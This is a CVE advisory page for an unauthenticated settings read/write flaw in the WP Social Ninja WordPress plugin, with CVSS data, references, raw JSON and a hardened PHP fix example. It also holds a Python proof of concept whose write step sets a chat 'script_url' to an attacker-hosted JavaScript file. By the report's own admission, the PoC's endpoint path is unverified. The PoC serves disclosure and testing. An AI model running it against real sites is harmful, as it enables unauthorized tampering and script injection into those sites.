Security Vulnerability Report
CVE-2025-13880 (CVSS 6.5, MEDIUM)

Published: 2025-12-17 05:16:11
Last Modified: 2026-04-15 00:35:42

Description

The WP Social Ninja – Embed Social Feeds, Customer Reviews, Chat Widgets (Google Reviews, YouTube Feed, Photo Feeds, and More) plugin for WordPress is vulnerable to unauthorized access and modification of data due to a missing capability check on the getAdvanceSettings and saveAdvanceSettings functions in all versions up to, and including, 4.0.1. This makes it possible for unauthenticated attackers to view and modify the plugin's advanced settings.

CVSS Details

CVSS Score
6.5
Severity
MEDIUM
CVSS Vector
CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:L/A:N

Configurations (Affected Products)

No configuration data is available in the CVE record; the affected range reported is:

WP Social Ninja <= 4.0.1

PoC / Exploit Code

⚠ For Security Research Only
The following code is for security research and authorized testing only.
The REST route path and request body used in this PoC are not stated in the CVE record; the plugin's actual route definitions are in the app/Http/Routes/api.php file cited in the references, so verify the path against it before relying on the result.

```python
# CVE-2025-13880 PoC - Unauthenticated Access to WP Social Ninja Settings
# Affected: WP Social Ninja <= 4.0.1
import json

import requests

target_url = input("Enter target URL (e.g., https://example.com): ").rstrip('/')


def cve_2025_13880_poc():
    """
    This PoC demonstrates the missing capability check vulnerability in the
    WP Social Ninja plugin. Attackers can access and modify plugin settings
    without authentication.
    """
    print("[*] CVE-2025-13880 WP Social Ninja - Unauthenticated Settings Access PoC")
    print("=" * 80)

    # Step 1: Attempt to retrieve advanced settings without authentication
    print("\n[Step 1] Attempting to retrieve advanced settings...")
    get_settings_endpoint = f"{target_url}/wp-json/wp-social-ninja/v1/advance-settings"
    headers = {
        'Content-Type': 'application/json',
        'User-Agent': 'Mozilla/5.0 (Windows NT 10.0; Win64; x64)'
    }
    try:
        response = requests.get(get_settings_endpoint, headers=headers, timeout=10, verify=False)
        print(f"[*] GET Request Status: {response.status_code}")
        if response.status_code == 200:
            print("[!] VULNERABLE: Settings can be accessed without authentication!")
            # response.json() raises ValueError if the 200 body is not JSON
            print(f"[+] Response: {json.dumps(response.json(), indent=2)}")
        elif response.status_code == 401 or response.status_code == 403:
            print("[-] NOT VULNERABLE: Authentication required (expected behavior)")
        else:
            print(f"[*] Unexpected status code: {response.status_code}")
            print(f"[*] Response: {response.text[:200]}")
    except (requests.exceptions.RequestException, ValueError) as e:
        print(f"[-] Request failed: {e}")

    # Step 2: Attempt to modify settings without authentication
    print("\n[Step 2] Attempting to modify settings...")
    modify_endpoint = f"{target_url}/wp-json/wp-social-ninja/v1/advance-settings"

    # Malicious payload - attacker could modify any setting
    payload = {
        "social_config": {
            "api_key": "attacker-controlled-key",
            "feeds_source": "malicious-source.com"
        },
        "chat_config": {
            "enabled": True,
            "script_url": "https://attacker.com/malicious-chat.js"
        }
    }
    try:
        response = requests.post(modify_endpoint, headers=headers, json=payload, timeout=10, verify=False)
        print(f"[*] POST Request Status: {response.status_code}")
        if response.status_code == 200:
            print("[!] VULNERABLE: Settings can be modified without authentication!")
            print(f"[+] Response: {response.text}")
        elif response.status_code == 401 or response.status_code == 403:
            print("[-] NOT VULNERABLE: Authentication required (expected behavior)")
        else:
            print(f"[*] Unexpected status code: {response.status_code}")
    except requests.exceptions.RequestException as e:
        print(f"[-] Request failed: {e}")

    print("\n[*] PoC execution completed")
    print("[!] Note: This is for educational and authorized testing purposes only")


if __name__ == "__main__":
    cve_2025_13880_poc()
```
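As an added, defender-side illustration of the fix class for CWE-862 (this is not code from the plugin or from this report): a WordPress REST settings route with the weak permission callback beside a hardened one that checks a capability. It uses core register_rest_route; the plugin's own routing and policy files (api.php, SettingsPolicy.php, PermissionManager.php) are cited in the references, and the namespace, function and option names here are placeholders.

```php
<?php
// Added example, not the plugin's code: the CWE-862 pattern behind
// CVE-2025-13880 is a settings REST route whose handlers run without a
// capability check. Core WordPress APIs are used here; route namespace,
// handler and option names are placeholders.
// Weak form (what a missing capability check looks like on a REST route):
//   'permission_callback' => '__return_true',  // anyone can reach the handler

// Hardened form: require an administrative capability. Under cookie auth
// WordPress sets no current user unless a valid X-WP-Nonce header is sent,
// so an anonymous request gets 401 here and a low-privilege user gets 403.
function example_settings_permission( WP_REST_Request $request ) {
    if ( ! current_user_can( 'manage_options' ) ) {
        return new WP_Error(
            'rest_forbidden',
            'You are not allowed to read or change these settings.',
            array( 'status' => rest_authorization_required_code() )
        );
    }
    return true;
}

function example_get_advance_settings( WP_REST_Request $request ) {
    return rest_ensure_response( get_option( 'example_advance_settings', array() ) );
}

function example_save_advance_settings( WP_REST_Request $request ) {
    // 'settings' was already validated against the schema declared below.
    update_option( 'example_advance_settings', $request->get_param( 'settings' ) );
    return rest_ensure_response( array( 'saved' => true ) );
}

add_action( 'rest_api_init', function () {
    register_rest_route( 'example-plugin/v1', '/advance-settings', array(
        array(
            'methods'             => WP_REST_Server::READABLE,
            'callback'            => 'example_get_advance_settings',
            'permission_callback' => 'example_settings_permission',
        ),
        array(
            'methods'             => WP_REST_Server::CREATABLE,
            'callback'            => 'example_save_advance_settings',
            'permission_callback' => 'example_settings_permission',
            'args'                => array(
                'settings' => array( 'required' => true, 'type' => 'object' ),
            ),
        ),
    ) );
} );
```

The same permission callback is attached to both the read and the write endpoint, which is the property the vulnerable getAdvanceSettings/saveAdvanceSettings pair lacked.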

References

https://plugins.trac.wordpress.org/browser/wp-social-reviews/tags/4.0.1/app/Http/Controllers/SettingsController.php#L144
https://plugins.trac.wordpress.org/browser/wp-social-reviews/tags/4.0.1/app/Http/Policies/SettingsPolicy.php#L14
https://plugins.trac.wordpress.org/browser/wp-social-reviews/tags/4.0.1/app/Http/Routes/api.php#L44
https://plugins.trac.wordpress.org/browser/wp-social-reviews/tags/4.0.1/app/Services/PermissionManager.php#L176
https://www.wordfence.com/threat-intel/vulnerabilities/id/8b8e3cb9-00b3-4500-adf0-c8a9fbf9d546?source=cve

Raw JSON Data

```json
{
  "cve": {
    "id": "CVE-2025-13880",
    "sourceIdentifier": "[email protected]",
    "published": "2025-12-17T05:16:11.180",
    "lastModified": "2026-04-15T00:35:42.020",
    "vulnStatus": "Deferred",
    "cveTags": [],
    "descriptions": [
      {
        "lang": "en",
        "value": "The WP Social Ninja – Embed Social Feeds, Customer Reviews, Chat Widgets (Google Reviews, YouTube Feed, Photo Feeds, and More) plugin for WordPress is vulnerable to unauthorized access and modification of data due to a missing capability check on the getAdvanceSettings and saveAdvanceSettings functions in all versions up to, and including, 4.0.1. This makes it possible for unauthenticated attackers to view and modify plugin's advanced settings."
      }
    ],
    "metrics": {
      "cvssMetricV31": [
        {
          "source": "[email protected]",
          "type": "Secondary",
          "cvssData": {
            "version": "3.1",
            "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:L/A:N",
            "baseScore": 6.5,
            "baseSeverity": "MEDIUM",
            "attackVector": "NETWORK",
            "attackComplexity": "LOW",
            "privilegesRequired": "NONE",
            "userInteraction": "NONE",
            "scope": "UNCHANGED",
            "confidentialityImpact": "LOW",
            "integrityImpact": "LOW",
            "availabilityImpact": "NONE"
          },
          "exploitabilityScore": 3.9,
          "impactScore": 2.5
        }
      ]
    },
    "weaknesses": [
      {
        "source": "[email protected]",
        "type": "Secondary",
        "description": [
          {
            "lang": "en",
            "value": "CWE-862"
          }
        ]
      }
    ],
    "references": [
      {
        "url": "https://plugins.trac.wordpress.org/browser/wp-social-reviews/tags/4.0.1/app/Http/Controllers/SettingsController.php#L144",
        "source": "[email protected]"
      },
      {
        "url": "https://plugins.trac.wordpress.org/browser/wp-social-reviews/tags/4.0.1/app/Http/Policies/SettingsPolicy.php#L14",
        "source": "[email protected]"
      },
      {
        "url": "https://plugins.trac.wordpress.org/browser/wp-social-reviews/tags/4.0.1/app/Http/Routes/api.php#L44",
        "source": "[email protected]"
      },
      {
        "url": "https://plugins.trac.wordpress.org/browser/wp-social-reviews/tags/4.0.1/app/Services/PermissionManager.php#L176",
        "source": "[email protected]"
      },
      {
        "url": "https://www.wordfence.com/threat-intel/vulnerabilities/id/8b8e3cb9-00b3-4500-adf0-c8a9fbf9d546?source=cve",
        "source": "[email protected]"
      }
    ]
  }
}
```